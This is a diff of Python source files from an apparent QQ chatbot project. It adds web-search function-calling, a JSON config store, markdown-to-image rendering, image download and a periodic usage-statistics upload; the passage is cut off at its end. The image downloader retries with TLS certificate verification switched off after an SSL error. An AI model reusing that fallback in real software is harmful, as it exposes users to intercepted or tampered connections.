html = await response.text(encoding="utf-8")
|
||||
doc = Document(html)
|
||||
ret = doc.summary(html_partial=True)
|
||||
soup = BeautifulSoup(ret, 'html.parser')
|
||||
ret = tidy_text(soup.get_text())
|
||||
return ret
|
||||
|
||||
|
||||
async def web_search(prompt, provider: Provider, session_id, official_fc=False):
|
||||
'''
|
||||
official_fc: 使用官方 function-calling
|
||||
'''
|
||||
new_func_call = FuncCall(provider)
|
||||
|
||||
new_func_call.add_func("web_search", [{
|
||||
"type": "string",
|
||||
"name": "keyword",
|
||||
"description": "搜索关键词"
|
||||
}],
|
||||
"通过搜索引擎搜索。如果问题需要获取近期、实时的消息,在网页上搜索(如天气、新闻或任何需要通过网页获取信息的问题),则调用此函数;如果没有,不要调用此函数。",
|
||||
search_from_bing
|
||||
)
|
||||
new_func_call.add_func("fetch_website_content", [{
|
||||
"type": "string",
|
||||
"name": "url",
|
||||
"description": "要获取内容的网页链接"
|
||||
}],
|
||||
"获取网页的内容。如果问题带有合法的网页链接并且用户有需求了解网页内容(例如: `帮我总结一下 https://github.com 的内容`), 就调用此函数。如果没有,不要调用此函数。",
|
||||
fetch_website_content
|
||||
)
|
||||
|
||||
has_func = False
|
||||
function_invoked_ret = ""
|
||||
if official_fc:
|
||||
# we use official function-calling
|
||||
result = await provider.text_chat(prompt, session_id, tools=new_func_call.get_func())
|
||||
if isinstance(result, Function):
|
||||
logger.debug(f"web_searcher - function-calling: {result}")
|
||||
func_obj = None
|
||||
for i in new_func_call.func_list:
|
||||
if i["name"] == result.name:
|
||||
func_obj = i["func_obj"]
|
||||
break
|
||||
if not func_obj:
|
||||
return await provider.text_chat(prompt, session_id) + "\n(网页搜索失败, 此为默认回复)"
|
||||
try:
|
||||
args = json.loads(result.arguments)
|
||||
function_invoked_ret = await func_obj(**args)
|
||||
has_func = True
|
||||
except BaseException as e:
|
||||
traceback.print_exc()
|
||||
return await provider.text_chat(prompt, session_id) + "\n(网页搜索失败, 此为默认回复)"
|
||||
else:
|
||||
return result
|
||||
else:
|
||||
# we use our own function-calling
|
||||
try:
|
||||
args = {
|
||||
'question': prompt,
|
||||
'func_definition': new_func_call.func_dump(),
|
||||
'is_task': False,
|
||||
'is_summary': False,
|
||||
}
|
||||
function_invoked_ret, has_func = await asyncio.to_thread(new_func_call.func_call, **args)
|
||||
except BaseException as e:
|
||||
res = await provider.text_chat(prompt) + "\n(网页搜索失败, 此为默认回复)"
|
||||
return res
|
||||
has_func = True
|
||||
|
||||
if has_func:
|
||||
await provider.forget(session_id)
|
||||
summary_prompt = f"""
|
||||
你是一个专业且高效的助手,你的任务是
|
||||
1. 根据下面的相关材料对用户的问题 `{prompt}` 进行总结;
|
||||
2. 简单地发表你对这个问题的简略看法。
|
||||
|
||||
# 例子
|
||||
1. 从网上的信息来看,可以知道...我个人认为...你觉得呢?
|
||||
2. 根据网上的最新信息,可以得知...我觉得...你怎么看?
|
||||
|
||||
# 限制
|
||||
1. 限制在 200 字以内;
|
||||
2. 请**直接输出总结**,不要输出多余的内容和提示语。
|
||||
|
||||
# 相关材料
|
||||
{function_invoked_ret}"""
|
||||
ret = await provider.text_chat(summary_prompt, session_id)
|
||||
return ret
|
||||
return function_invoked_ret
|
||||
119
util/cmd_config.py
Normal file
@@ -0,0 +1,119 @@
|
||||
import os
|
||||
import json
|
||||
from typing import Union
|
||||
|
||||
cpath = "data/cmd_config.json"
|
||||
|
||||
def check_exist():
|
||||
if not os.path.exists(cpath):
|
||||
with open(cpath, "w", encoding="utf-8-sig") as f:
|
||||
json.dump({}, f, indent=4, ensure_ascii=False)
|
||||
f.flush()
|
||||
|
||||
|
||||
class CmdConfig():
|
||||
|
||||
@staticmethod
|
||||
def get(key, default=None):
|
||||
check_exist()
|
||||
with open(cpath, "r", encoding="utf-8-sig") as f:
|
||||
d = json.load(f)
|
||||
if key in d:
|
||||
return d[key]
|
||||
else:
|
||||
return default
|
||||
|
||||
@staticmethod
|
||||
def get_all():
|
||||
check_exist()
|
||||
with open(cpath, "r", encoding="utf-8-sig") as f:
|
||||
return json.load(f)
|
||||
|
||||
@staticmethod
|
||||
def put(key, value):
|
||||
check_exist()
|
||||
with open(cpath, "r", encoding="utf-8-sig") as f:
|
||||
d = json.load(f)
|
||||
d[key] = value
|
||||
with open(cpath, "w", encoding="utf-8-sig") as f:
|
||||
json.dump(d, f, indent=4, ensure_ascii=False)
|
||||
f.flush()
|
||||
|
||||
@staticmethod
|
||||
def put_by_dot_str(key: str, value):
|
||||
'''
|
||||
根据点分割的字符串,将值写入配置文件
|
||||
'''
|
||||
check_exist()
|
||||
with open(cpath, "r", encoding="utf-8-sig") as f:
|
||||
d = json.load(f)
|
||||
_d = d
|
||||
_ks = key.split(".")
|
||||
for i in range(len(_ks)):
|
||||
if i == len(_ks) - 1:
|
||||
_d[_ks[i]] = value
|
||||
else:
|
||||
_d = _d[_ks[i]]
|
||||
with open(cpath, "w", encoding="utf-8-sig") as f:
|
||||
json.dump(d, f, indent=4, ensure_ascii=False)
|
||||
f.flush()
|
||||
|
||||
@staticmethod
|
||||
def init_attributes(key: Union[str, list], init_val=""):
|
||||
check_exist()
|
||||
conf_str = ''
|
||||
with open(cpath, "r", encoding="utf-8-sig") as f:
|
||||
conf_str = f.read()
|
||||
if conf_str.startswith(u'\ufeff'):
|
||||
conf_str = conf_str.encode('utf8')[3:].decode('utf8')
|
||||
d = json.loads(conf_str)
|
||||
_tag = False
|
||||
|
||||
if isinstance(key, str):
|
||||
if key not in d:
|
||||
d[key] = init_val
|
||||
_tag = True
|
||||
elif isinstance(key, list):
|
||||
for k in key:
|
||||
if k not in d:
|
||||
d[k] = init_val
|
||||
_tag = True
|
||||
if _tag:
|
||||
with open(cpath, "w", encoding="utf-8-sig") as f:
|
||||
json.dump(d, f, indent=4, ensure_ascii=False)
|
||||
f.flush()
|
||||
|
||||
|
||||
def init_astrbot_config_items():
|
||||
# 加载默认配置
|
||||
cc = CmdConfig()
|
||||
cc.init_attributes("qq_forward_threshold", 200)
|
||||
cc.init_attributes("qq_welcome", "")
|
||||
cc.init_attributes("qq_pic_mode", False)
|
||||
cc.init_attributes("gocq_host", "127.0.0.1")
|
||||
cc.init_attributes("gocq_http_port", 5700)
|
||||
cc.init_attributes("gocq_websocket_port", 6700)
|
||||
cc.init_attributes("gocq_react_group", True)
|
||||
cc.init_attributes("gocq_react_guild", True)
|
||||
cc.init_attributes("gocq_react_friend", True)
|
||||
cc.init_attributes("gocq_react_group_increase", True)
|
||||
cc.init_attributes("other_admins", [])
|
||||
cc.init_attributes("CHATGPT_BASE_URL", "")
|
||||
cc.init_attributes("qqbot_secret", "")
|
||||
cc.init_attributes("qqofficial_enable_group_message", False)
|
||||
cc.init_attributes("admin_qq", "")
|
||||
cc.init_attributes("nick_qq", ["!", "!", "ai"])
|
||||
cc.init_attributes("admin_qqchan", "")
|
||||
cc.init_attributes("llm_env_prompt", "")
|
||||
cc.init_attributes("llm_wake_prefix", "")
|
||||
cc.init_attributes("default_personality_str", "")
|
||||
cc.init_attributes("openai_image_generate", {
|
||||
"model": "dall-e-3",
|
||||
"size": "1024x1024",
|
||||
"style": "vivid",
|
||||
"quality": "standard",
|
||||
})
|
||||
cc.init_attributes("http_proxy", "")
|
||||
cc.init_attributes("https_proxy", "")
|
||||
cc.init_attributes("dashboard_username", "")
|
||||
cc.init_attributes("dashboard_password", "")
|
||||
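A short usage sketch for CmdConfig. It reads and writes data/cmd_config.json relative to the working directory, so this assumes you run it from the bot's root and that the data/ directory already exists:

```python
from util.cmd_config import CmdConfig, init_astrbot_config_items

init_astrbot_config_items()                    # make sure the default keys exist
CmdConfig.put("qq_forward_threshold", 300)     # flat key
CmdConfig.put_by_dot_str("openai_image_generate.size", "512x512")  # nested key via dot path

print(CmdConfig.get("qq_forward_threshold"))   # 300
print(CmdConfig.get_all()["openai_image_generate"]["size"])        # 512x512
```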
@@ -1,3 +0,0 @@
|
||||
class PromptExceededError(Exception):
|
||||
|
||||
pass
|
||||
521
util/general_utils.py
Normal file
@@ -0,0 +1,521 @@
|
||||
import time
|
||||
import socket
|
||||
import os
|
||||
import re
|
||||
import requests
|
||||
import aiohttp
|
||||
import platform
|
||||
import json
|
||||
import sys
|
||||
import psutil
|
||||
import ssl
|
||||
|
||||
from PIL import Image, ImageDraw, ImageFont
|
||||
from type.types import GlobalObject
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot-core')
|
||||
|
||||
|
||||
def port_checker(port: int, host: str = "localhost"):
|
||||
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
sk.settimeout(1)
|
||||
try:
|
||||
sk.connect((host, port))
|
||||
sk.close()
|
||||
return True
|
||||
except Exception:
|
||||
sk.close()
|
||||
return False
|
||||
|
||||
|
||||
def get_font_path() -> str:
|
||||
if os.path.exists("resources/fonts/syst.otf"):
|
||||
font_path = "resources/fonts/syst.otf"
|
||||
elif os.path.exists("QQChannelChatGPT/resources/fonts/syst.otf"):
|
||||
font_path = "QQChannelChatGPT/resources/fonts/syst.otf"
|
||||
elif os.path.exists("AstrBot/resources/fonts/syst.otf"):
|
||||
font_path = "AstrBot/resources/fonts/syst.otf"
|
||||
elif os.path.exists("C:/Windows/Fonts/simhei.ttf"):
|
||||
font_path = "C:/Windows/Fonts/simhei.ttf"
|
||||
elif os.path.exists("/usr/share/fonts/opentype/noto/NotoSansCJK-Regular.ttc"):
|
||||
font_path = "/usr/share/fonts/opentype/noto/NotoSansCJK-Regular.ttc"
|
||||
else:
|
||||
raise Exception("找不到字体文件")
|
||||
return font_path
|
||||
|
||||
|
||||
def word2img(title: str, text: str, max_width=30, font_size=20):
|
||||
font_path = get_font_path()
|
||||
width_factor = 1.0
|
||||
height_factor = 1.5
|
||||
# 格式化文本宽度最大为30
|
||||
lines = text.split('\n')
|
||||
i = 0
|
||||
length = len(lines)
|
||||
for l in lines:
|
||||
if len(l) > max_width:
|
||||
cp = l
|
||||
for ii in range(len(l)):
|
||||
if ii % max_width == 0:
|
||||
cp = cp[:ii] + '\n' + cp[ii:]
|
||||
length += 1
|
||||
lines[i] = cp
|
||||
i += 1
|
||||
text = '\n'.join(lines)
|
||||
width = int(max_width * font_size * width_factor)
|
||||
height = int(length * font_size * height_factor)
|
||||
image = Image.new('RGB', (width, height), (255, 255, 255))
|
||||
draw = ImageDraw.Draw(image)
|
||||
|
||||
text_font = ImageFont.truetype(font_path, font_size)
|
||||
title_font = ImageFont.truetype(font_path, font_size + 5)
|
||||
# 标题居中
|
||||
title_width, title_height = title_font.getsize(title)
|
||||
draw.text(((width - title_width) / 2, 10),
|
||||
title, fill=(0, 0, 0), font=title_font)
|
||||
# 文本不居中
|
||||
draw.text((10, title_height+20), text, fill=(0, 0, 0), font=text_font)
|
||||
|
||||
return image
|
||||
|
||||
|
||||
def render_markdown(markdown_text, image_width=800, image_height=600, font_size=26, font_color=(0, 0, 0), bg_color=(255, 255, 255)):
|
||||
|
||||
HEADER_MARGIN = 20
|
||||
HEADER_FONT_STANDARD_SIZE = 42
|
||||
|
||||
QUOTE_LEFT_LINE_MARGIN = 10
|
||||
QUOTE_FONT_LINE_MARGIN = 6 # 引用文字距离左边线的距离和上下的距离
|
||||
QUOTE_LEFT_LINE_HEIGHT = font_size + QUOTE_FONT_LINE_MARGIN * 2
|
||||
QUOTE_LEFT_LINE_WIDTH = 5
|
||||
QUOTE_LEFT_LINE_COLOR = (180, 180, 180)
|
||||
QUOTE_FONT_SIZE = font_size
|
||||
QUOTE_FONT_COLOR = (180, 180, 180)
|
||||
# QUOTE_BG_COLOR = (255, 255, 255)
|
||||
|
||||
CODE_BLOCK_MARGIN = 10
|
||||
CODE_BLOCK_FONT_SIZE = font_size
|
||||
CODE_BLOCK_FONT_COLOR = (255, 255, 255)
|
||||
CODE_BLOCK_BG_COLOR = (240, 240, 240)
|
||||
CODE_BLOCK_CODES_MARGIN_VERTICAL = 5 # 代码块和代码之间的距离
|
||||
CODE_BLOCK_CODES_MARGIN_HORIZONTAL = 5 # 代码块和代码之间的距离
|
||||
CODE_BLOCK_TEXT_MARGIN = 4 # 代码和代码之间的距离
|
||||
|
||||
INLINE_CODE_MARGIN = 8
|
||||
INLINE_CODE_FONT_SIZE = font_size
|
||||
INLINE_CODE_FONT_COLOR = font_color
|
||||
INLINE_CODE_FONT_MARGIN = 4
|
||||
INLINE_CODE_BG_COLOR = (230, 230, 230)
|
||||
INLINE_CODE_BG_HEIGHT = INLINE_CODE_FONT_SIZE + INLINE_CODE_FONT_MARGIN * 2
|
||||
|
||||
LIST_MARGIN = 8
|
||||
LIST_FONT_SIZE = font_size
|
||||
LIST_FONT_COLOR = font_color
|
||||
|
||||
TEXT_LINE_MARGIN = 8
|
||||
|
||||
IMAGE_MARGIN = 15
|
||||
# 用于匹配图片的正则表达式
|
||||
IMAGE_REGEX = r"!\s*\[.*?\]\s*\((.*?)\)"
|
||||
|
||||
font_path = get_font_path()
|
||||
font_path1 = font_path
|
||||
|
||||
# 加载字体
|
||||
font = ImageFont.truetype(font_path, font_size)
|
||||
|
||||
images: dict = {}  # maps a markdown line index to the PIL image referenced on that line
|
||||
|
||||
# pre_process, get height of each line
|
||||
pre_lines = markdown_text.split('\n')
|
||||
height = 0
|
||||
pre_in_code = False
|
||||
i = -1
|
||||
_pre_lines = []
|
||||
for line in pre_lines:
|
||||
i += 1
|
||||
# 处理图片
|
||||
if re.search(IMAGE_REGEX, line):
|
||||
try:
|
||||
image_url = re.findall(IMAGE_REGEX, line)[0]
|
||||
print(image_url)
|
||||
image_res = Image.open(requests.get(
|
||||
image_url, stream=True, timeout=5).raw)
|
||||
images[i] = image_res
|
||||
# 最大不得超过image_width的50%
|
||||
img_height = image_res.size[1]
|
||||
|
||||
if image_res.size[0] > image_width*0.5:
|
||||
image_res = image_res.resize(
|
||||
(int(image_width*0.5), int(image_res.size[1]*image_width*0.5/image_res.size[0])))
|
||||
img_height = image_res.size[1]
|
||||
|
||||
height += img_height + IMAGE_MARGIN*2
|
||||
|
||||
line = re.sub(IMAGE_REGEX, "", line)
|
||||
except Exception as e:
|
||||
print(e)
|
||||
line = re.sub(IMAGE_REGEX, "\n[加载失败的图片]\n", line)
|
||||
continue
|
||||
|
||||
line.replace("\t", " ")
|
||||
if font.getsize(line)[0] > image_width:
|
||||
cp = line
|
||||
_width = 0
|
||||
_word_cnt = 0
|
||||
for ii in range(len(line)):
|
||||
# 检测是否是中文
|
||||
_width += font.getsize(line[ii])[0]
|
||||
_word_cnt += 1
|
||||
if _width > image_width:
|
||||
_pre_lines.append(cp[:_word_cnt])
|
||||
cp = cp[_word_cnt:]
|
||||
_word_cnt = 0
|
||||
_width = 0
|
||||
_pre_lines.append(cp)
|
||||
else:
|
||||
_pre_lines.append(line)
|
||||
pre_lines = _pre_lines
|
||||
|
||||
i = -1
|
||||
for line in pre_lines:
|
||||
if line == "":
|
||||
height += TEXT_LINE_MARGIN
|
||||
continue
|
||||
i += 1
|
||||
line = line.strip()
|
||||
if pre_in_code and not line.startswith("```"):
|
||||
height += font_size + CODE_BLOCK_TEXT_MARGIN
|
||||
# pre_codes.append(line)
|
||||
continue
|
||||
if line.startswith("#"):
|
||||
header_level = line.count("#")
|
||||
height += HEADER_FONT_STANDARD_SIZE + HEADER_MARGIN*2 - header_level * 4
|
||||
elif line.startswith("-"):
|
||||
height += font_size+LIST_MARGIN*2
|
||||
elif line.startswith(">"):
|
||||
height += font_size+QUOTE_LEFT_LINE_MARGIN*2
|
||||
elif line.startswith("```"):
|
||||
if pre_in_code:
|
||||
pre_in_code = False
|
||||
# pre_codes = []
|
||||
height += CODE_BLOCK_MARGIN
|
||||
else:
|
||||
pre_in_code = True
|
||||
height += CODE_BLOCK_MARGIN
|
||||
elif re.search(r"`(.*?)`", line):
|
||||
height += font_size+INLINE_CODE_FONT_MARGIN*2+INLINE_CODE_MARGIN*2
|
||||
else:
|
||||
height += font_size + TEXT_LINE_MARGIN*2
|
||||
|
||||
markdown_text = '\n'.join(pre_lines)
|
||||
image_height = height
|
||||
if image_height < 100:
|
||||
image_height = 100
|
||||
image_width += 20
|
||||
|
||||
# 创建空白图像
|
||||
image = Image.new('RGB', (image_width, image_height), bg_color)
|
||||
draw = ImageDraw.Draw(image)
|
||||
|
||||
# 设置初始位置
|
||||
x, y = 10, 10
|
||||
|
||||
# 解析Markdown文本
|
||||
lines = markdown_text.split("\n")
|
||||
# lines = pre_lines
|
||||
|
||||
in_code_block = False
|
||||
code_block_start_y = 0
|
||||
code_block_codes = []
|
||||
|
||||
index = -1
|
||||
for line in lines:
|
||||
index += 1
|
||||
if in_code_block and not line.startswith("```"):
|
||||
code_block_codes.append(line)
|
||||
y += font_size + CODE_BLOCK_TEXT_MARGIN
|
||||
continue
|
||||
line = line.strip()
|
||||
|
||||
if line.startswith("#"):
|
||||
# 处理标题
|
||||
header_level = line.count("#")
|
||||
line = line.strip("#").strip()
|
||||
font_size_header = HEADER_FONT_STANDARD_SIZE - header_level * 4
|
||||
font = ImageFont.truetype(font_path, font_size_header)
|
||||
y += HEADER_MARGIN # 上边距
|
||||
# 字间距
|
||||
draw.text((x, y), line, font=font, fill=font_color)
|
||||
draw.line((x, y + font_size_header + 8, image_width - 10,
|
||||
y + font_size_header + 8), fill=(230, 230, 230), width=3)
|
||||
y += font_size_header + HEADER_MARGIN
|
||||
|
||||
elif line.startswith(">"):
|
||||
# 处理引用
|
||||
quote_text = line.strip(">")
|
||||
y += QUOTE_LEFT_LINE_MARGIN
|
||||
draw.line((x, y, x, y + QUOTE_LEFT_LINE_HEIGHT),
|
||||
fill=QUOTE_LEFT_LINE_COLOR, width=QUOTE_LEFT_LINE_WIDTH)
|
||||
font = ImageFont.truetype(font_path, QUOTE_FONT_SIZE)
|
||||
draw.text((x + QUOTE_FONT_LINE_MARGIN, y + QUOTE_FONT_LINE_MARGIN),
|
||||
quote_text, font=font, fill=QUOTE_FONT_COLOR)
|
||||
y += font_size + QUOTE_LEFT_LINE_HEIGHT + QUOTE_LEFT_LINE_MARGIN
|
||||
|
||||
elif line.startswith("-"):
|
||||
# 处理列表
|
||||
list_text = line.strip("-").strip()
|
||||
font = ImageFont.truetype(font_path, LIST_FONT_SIZE)
|
||||
y += LIST_MARGIN
|
||||
draw.text((x, y), " · " + list_text,
|
||||
font=font, fill=LIST_FONT_COLOR)
|
||||
y += font_size + LIST_MARGIN
|
||||
|
||||
elif line.startswith("```"):
|
||||
if not in_code_block:
|
||||
code_block_start_y = y+CODE_BLOCK_MARGIN
|
||||
in_code_block = True
|
||||
else:
|
||||
# print(code_block_codes)
|
||||
in_code_block = False
|
||||
codes = "\n".join(code_block_codes)
|
||||
code_block_codes = []
|
||||
draw.rounded_rectangle((x, code_block_start_y, image_width - 10, y+CODE_BLOCK_CODES_MARGIN_VERTICAL +
|
||||
CODE_BLOCK_TEXT_MARGIN), radius=5, fill=CODE_BLOCK_BG_COLOR, width=2)
|
||||
font = ImageFont.truetype(font_path1, CODE_BLOCK_FONT_SIZE)
|
||||
draw.text((x + CODE_BLOCK_CODES_MARGIN_HORIZONTAL, code_block_start_y +
|
||||
CODE_BLOCK_CODES_MARGIN_VERTICAL), codes, font=font, fill=font_color)
|
||||
y += CODE_BLOCK_CODES_MARGIN_VERTICAL + CODE_BLOCK_MARGIN
|
||||
# y += font_size+10
|
||||
elif re.search(r"`(.*?)`", line):
|
||||
y += INLINE_CODE_MARGIN # 上边距
|
||||
# 处理行内代码
|
||||
code_regex = r"`(.*?)`"
|
||||
parts_inline = re.findall(code_regex, line)
|
||||
# print(parts_inline)
|
||||
parts = re.split(code_regex, line)
|
||||
# print(parts)
|
||||
for part in parts:
|
||||
# note: this check has a small bug.
|
||||
# when the line looks like "hi`hi`", every part ends up in parts_inline.
|
||||
if part in parts_inline:
|
||||
font = ImageFont.truetype(font_path, INLINE_CODE_FONT_SIZE)
|
||||
code_text = part.strip("`")
|
||||
code_width = font.getsize(
|
||||
code_text)[0] + INLINE_CODE_FONT_MARGIN*2
|
||||
x += INLINE_CODE_MARGIN
|
||||
code_box = (x, y, x + code_width,
|
||||
y + INLINE_CODE_BG_HEIGHT)
|
||||
draw.rounded_rectangle(
|
||||
code_box, radius=5, fill=INLINE_CODE_BG_COLOR, width=2) # 使用灰色填充矩形框作为引用背景
|
||||
draw.text((x+INLINE_CODE_FONT_MARGIN, y),
|
||||
code_text, font=font, fill=font_color)
|
||||
x += code_width+INLINE_CODE_MARGIN-INLINE_CODE_FONT_MARGIN
|
||||
else:
|
||||
font = ImageFont.truetype(font_path, font_size)
|
||||
draw.text((x, y), part, font=font, fill=font_color)
|
||||
x += font.getsize(part)[0]
|
||||
y += font_size + INLINE_CODE_MARGIN
|
||||
x = 10
|
||||
|
||||
else:
|
||||
# 处理普通文本
|
||||
if line == "":
|
||||
y += TEXT_LINE_MARGIN
|
||||
else:
|
||||
font = ImageFont.truetype(font_path, font_size)
|
||||
|
||||
draw.text((x, y), line, font=font, fill=font_color)
|
||||
y += font_size + TEXT_LINE_MARGIN*2
|
||||
|
||||
# 图片特殊处理
|
||||
if index in images:
|
||||
image_res = images[index]
|
||||
# 最大不得超过image_width的50%
|
||||
if image_res.size[0] > image_width*0.5:
|
||||
image_res = image_res.resize(
|
||||
(int(image_width*0.5), int(image_res.size[1]*image_width*0.5/image_res.size[0])))
|
||||
image.paste(image_res, (IMAGE_MARGIN, y))
|
||||
y += image_res.size[1] + IMAGE_MARGIN*2
|
||||
return image
|
||||
|
||||
|
||||
def save_temp_img(img: Image) -> str:
|
||||
if not os.path.exists("temp"):
|
||||
os.makedirs("temp")
|
||||
|
||||
# 获得文件创建时间,清除超过1小时的
|
||||
try:
|
||||
for f in os.listdir("temp"):
|
||||
path = os.path.join("temp", f)
|
||||
if os.path.isfile(path):
|
||||
ctime = os.path.getctime(path)
|
||||
if time.time() - ctime > 3600:
|
||||
os.remove(path)
|
||||
except Exception as e:
|
||||
print(f"清除临时文件失败: {e}")
|
||||
|
||||
# 获得时间戳
|
||||
timestamp = int(time.time())
|
||||
p = f"temp/{timestamp}.jpg"
|
||||
|
||||
if isinstance(img, Image.Image):
|
||||
img.save(p)
|
||||
else:
|
||||
with open(p, "wb") as f:
|
||||
f.write(img)
|
||||
logger.info(f"保存临时图片: {p}")
|
||||
return p
|
||||
|
||||
async def download_image_by_url(url: str) -> str:
|
||||
'''
|
||||
下载图片
|
||||
'''
|
||||
try:
|
||||
logger.info(f"下载图片: {url}")
|
||||
async with aiohttp.ClientSession() as session:
|
||||
async with session.get(url) as resp:
|
||||
return save_temp_img(await resp.read())
|
||||
except aiohttp.client_exceptions.ClientConnectorSSLError as e:
|
||||
# 关闭SSL验证
|
||||
ssl_context = ssl.create_default_context()
|
||||
ssl_context.check_hostname = False
|
||||
ssl_context.verify_mode = ssl.CERT_NONE
|
||||
async with aiohttp.ClientSession(trust_env=False) as session:
|
||||
async with session.get(url, ssl=ssl_context) as resp:
|
||||
return save_temp_img(await resp.read())
|
||||
except Exception as e:
|
||||
raise e
|
||||
|
||||
|
||||
def create_text_image(title: str, text: str, max_width=30, font_size=20):
|
||||
'''
|
||||
文本转图片。
|
||||
title: 标题
|
||||
text: 文本内容
|
||||
max_width: 文本宽度最大值(默认30)
|
||||
font_size: 字体大小(默认20)
|
||||
|
||||
返回:文件路径
|
||||
'''
|
||||
try:
|
||||
img = word2img(title, text, max_width, font_size)
|
||||
p = save_temp_img(img)
|
||||
return p
|
||||
except Exception as e:
|
||||
raise e
|
||||
|
||||
|
||||
def create_markdown_image(text: str):
|
||||
'''
|
||||
markdown文本转图片。
|
||||
返回:文件路径
|
||||
'''
|
||||
try:
|
||||
img = render_markdown(text)
|
||||
p = save_temp_img(img)
|
||||
return p
|
||||
except Exception as e:
|
||||
raise e
|
||||
|
||||
|
||||
def try_migrate_config():
|
||||
'''
|
||||
将 cmd_config.json 迁移至 data/cmd_config.json
|
||||
'''
|
||||
if os.path.exists("cmd_config.json"):
|
||||
with open("cmd_config.json", "r", encoding="utf-8-sig") as f:
|
||||
data = json.load(f)
|
||||
with open("data/cmd_config.json", "w", encoding="utf-8-sig") as f:
|
||||
json.dump(data, f, indent=2, ensure_ascii=False)
|
||||
try:
|
||||
os.remove("cmd_config.json")
|
||||
except Exception as e:
|
||||
pass
|
||||
|
||||
|
||||
def get_local_ip_addresses():
|
||||
ip = ''
|
||||
try:
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
s.connect(('8.8.8.8', 80))
|
||||
ip = s.getsockname()[0]
|
||||
except BaseException as e:
|
||||
pass
|
||||
finally:
|
||||
s.close()
|
||||
return ip
|
||||
|
||||
|
||||
def get_sys_info(global_object: GlobalObject):
|
||||
mem = None
|
||||
stats = global_object.dashboard_data.stats
|
||||
os_name = platform.system()
|
||||
os_version = platform.version()
|
||||
|
||||
if 'sys_perf' in stats and 'memory' in stats['sys_perf']:
|
||||
mem = stats['sys_perf']['memory']
|
||||
return {
|
||||
'mem': mem,
|
||||
'os': os_name + '_' + os_version,
|
||||
'py': platform.python_version(),
|
||||
}
|
||||
|
||||
|
||||
def upload(_global_object: GlobalObject):
|
||||
while True:
|
||||
addr_ip = ''
|
||||
try:
|
||||
res = {
|
||||
"version": _global_object.version,
|
||||
"count": _global_object.cnt_total,
|
||||
"ip": addr_ip,
|
||||
"sys": sys.platform,
|
||||
"admin": "null",
|
||||
}
|
||||
resp = requests.post(
|
||||
'https://api.soulter.top/upload', data=json.dumps(res), timeout=5)
|
||||
if resp.status_code == 200:
|
||||
ok = resp.json()
|
||||
if ok['status'] == 'ok':
|
||||
_global_object.cnt_total = 0
|
||||
except BaseException as e:
|
||||
pass
|
||||
time.sleep(10*60)
|
||||
|
||||
def retry(n: int = 3):
|
||||
'''
|
||||
重试装饰器
|
||||
'''
|
||||
def decorator(func):
|
||||
def wrapper(*args, **kwargs):
|
||||
for i in range(n):
|
||||
try:
|
||||
return func(*args, **kwargs)
|
||||
except Exception as e:
|
||||
if i == n-1: raise e
|
||||
logger.warning(f"函数 {func.__name__} 第 {i+1} 次重试... {e}")
|
||||
return wrapper
|
||||
return decorator
|
||||
|
||||
|
||||
def run_monitor(global_object: GlobalObject):
|
||||
'''
|
||||
监测机器性能
|
||||
- Bot 内存使用量
|
||||
- CPU 占用率
|
||||
'''
|
||||
start_time = time.time()
|
||||
while True:
|
||||
stat = global_object.dashboard_data.stats
|
||||
# 程序占用的内存大小
|
||||
mem = psutil.Process().memory_info().rss / 1024 / 1024 # MB
|
||||
stat['sys_perf'] = {
|
||||
'memory': mem,
|
||||
'cpu': psutil.cpu_percent()
|
||||
}
|
||||
stat['sys_start_time'] = start_time
|
||||
time.sleep(30)
|
||||
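As an illustration of the retry decorator defined above (the flaky function is made up: it fails twice, then succeeds; importing util.general_utils also assumes the project's dependencies such as Pillow, psutil and SparkleLogging are installed):

```python
from util.general_utils import retry

attempts = {"n": 0}

@retry(3)
def flaky_fetch():
    attempts["n"] += 1
    if attempts["n"] < 3:
        raise ConnectionError("temporary failure")   # simulated transient error
    return "ok"

print(flaky_fetch())   # logs two warnings, then prints "ok"
```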
11
util/log.py
@@ -1,11 +0,0 @@
|
||||
import logging
|
||||
from logging.handlers import RotatingFileHandler
|
||||
import colorlog
|
||||
|
||||
logger = logging.getLogger("QQChannelChatGPT")
|
||||
logger.setLevel(logging.DEBUG)
|
||||
handler = colorlog.StreamHandler()
|
||||
fmt = "%(log_color)s[%(name)s] %(message)s"
|
||||
handler.setFormatter(colorlog.ColoredFormatter(
|
||||
fmt))
|
||||
logger.addHandler(handler)
|
||||
5
util/plugin_dev/api/v1/bot.py
Normal file
@@ -0,0 +1,5 @@
|
||||
from type.plugin import PluginMetadata, PluginType
|
||||
from type.register import RegisteredLLM, RegisteredPlatform, RegisteredPlugin, RegisteredPlugins
|
||||
from type.types import GlobalObject
|
||||
from type.message import AstrMessageEvent
|
||||
from type.command import CommandResult
|
||||
82
util/plugin_dev/api/v1/config.py
Normal file
@@ -0,0 +1,82 @@
|
||||
from typing import Union
|
||||
import os
|
||||
import json
|
||||
|
||||
def load_config(namespace: str) -> Union[dict, bool]:
|
||||
'''
|
||||
从配置文件中加载配置。
|
||||
namespace: str, 配置的唯一识别符,也就是配置文件的名字。
|
||||
返回值: 当配置文件存在时,返回 namespace 对应配置文件的内容dict,否则返回 False。
|
||||
'''
|
||||
path = f"data/config/{namespace}.json"
|
||||
if not os.path.exists(path):
|
||||
return False
|
||||
with open(path, "r", encoding="utf-8-sig") as f:
|
||||
ret = {}
|
||||
data = json.load(f)
|
||||
for k in data:
|
||||
ret[k] = data[k]["value"]
|
||||
return ret
|
||||
|
||||
def put_config(namespace: str, name: str, key: str, value, description: str):
|
||||
'''
|
||||
将配置项写入以namespace为名字的配置文件,如果key不存在于目标配置文件中。当前 value 仅支持 str, int, float, bool, list 类型(暂不支持 dict)。
|
||||
namespace: str, 配置的唯一识别符,也就是配置文件的名字。
|
||||
name: str, 配置项的显示名字。
|
||||
key: str, 配置项的键。
|
||||
value: str, int, float, bool, list, 配置项的值。
|
||||
description: str, 配置项的描述。
|
||||
注意:只有当 namespace 为插件名(info 函数中的 name)时,该配置才会显示到可视化面板上。
|
||||
注意:value一定要是该配置项对应类型的值,否则类型判断会乱。
|
||||
'''
|
||||
if namespace == "":
|
||||
raise ValueError("namespace 不能为空。")
|
||||
if namespace.startswith("internal_"):
|
||||
raise ValueError("namespace 不能以 internal_ 开头。")
|
||||
if not isinstance(key, str):
|
||||
raise ValueError("key 只支持 str 类型。")
|
||||
if not isinstance(value, (str, int, float, bool, list)):
|
||||
